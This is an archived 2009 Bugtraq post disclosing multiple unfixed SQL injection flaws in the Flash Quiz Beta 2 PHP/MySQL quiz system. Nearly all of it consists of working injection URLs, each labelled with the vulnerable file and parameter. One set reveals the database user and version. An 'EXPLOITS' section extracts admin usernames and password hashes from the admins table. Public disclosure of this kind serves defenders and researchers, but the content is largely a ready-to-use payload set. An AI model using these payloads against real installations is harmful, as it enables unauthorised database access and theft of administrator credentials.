| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 21 May 2009 10:45:09 -0600 From: y3nh4ck3r@...il.com To: bugtraq@...urityfocus.com Subject: MULTIPLE SQL INJECTION VULNERABILITIES --Flash Quiz Beta 2--> -------------------------------------------------------------- MULTIPLE SQL INJECTION VULNERABILITIES --Flash Quiz Beta 2--> -------------------------------------------------------------- CMS INFORMATION: -->WEB: http://sourceforge.net/projects/flashquiz/ -->DOWNLOAD: http://sourceforge.net/projects/flashquiz/ -->DEMO: N/A -->CATEGORY: CMS / Testing -->DESCRIPTION: A Flash quiz system with a PHP/MYSQL back end supporting multiple quizzes per instance, result tracking, and high score tracking. -->RELEASED: 2009-04-13 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: N/A -->CATEGORY: SQL INJECTION -->AFFECT VERSION: Beta 2 (maybe <= ?) -->Discovered Bug date: 2009-05-20 -->Reported Bug date: 2009-05-20 -->Fixed bug date: Not fixed -->Info patch: Not fixed -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ######################### //////////////////////// SQL INJECTION (SQLi): //////////////////////// ######################### <<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>> ------- INTRO: ------- This system is completely vulnerable to sql injection. ------------------- PROOFS OF CONCEPT: ------------------- [++] GET var --> 'quiz' [++] File vuln --> 'num_questions.php' ~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/* [++] GET var --> 'quiz' and 'order_number' [++] File vuln --> 'answers.php' ~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/* ~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/* [++] GET var --> 'quiz' [++] File vuln --> 'high_score.php' ~~~~~> http://[HOST]/[PATH]/high_score.php?quiz=-1+UNION+ALL+SELECT+version(),2,concat(user(),0x3A3A3A,version()),database(),5,6,7/* [++] GET var --> 'quiz' [++] File vuln --> 'high_score_web.php' ~~~~~> http://[HOST]/[PATH]/high_score_web.php?quiz=-1+UNION+ALL+SELECT+version(),2,concat(user(),0x3A3A3A,version()),database(),5,6,7/* [++] GET var --> 'quiz' [++] File vuln --> 'results_table_web.php' ~~~~~> http://[HOST]/[PATH]/results_table_web.php?quiz=-1+UNION+ALL+SELECT+version(),user(),concat(user(),0x3A3A3A,version()),database(),current_user(),6,database()/* [++] GET var --> 'quiz' and 'order_number' [++] File vuln --> 'question.php' ~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/* ~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/* [++[Return]++] ~~~~~> user, version and database in DB. ---------- EXPLOITS: ---------- ~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/* ~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/* ~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/* ~~~~~> http://[HOST]/[PATH]/high_score.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/* ~~~~~> http://[HOST]/[PATH]/high_score_web.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/* ~~~~~> http://[HOST]/[PATH]/results_table_web.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/* ~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/* ~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/* [++[Return]++] ~~~~~> username:::password_hash in 'admins' table ####################################################################### ####################################################################### ##*******************************************************************## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### #######################################################################
Powered by blists - more mailing lists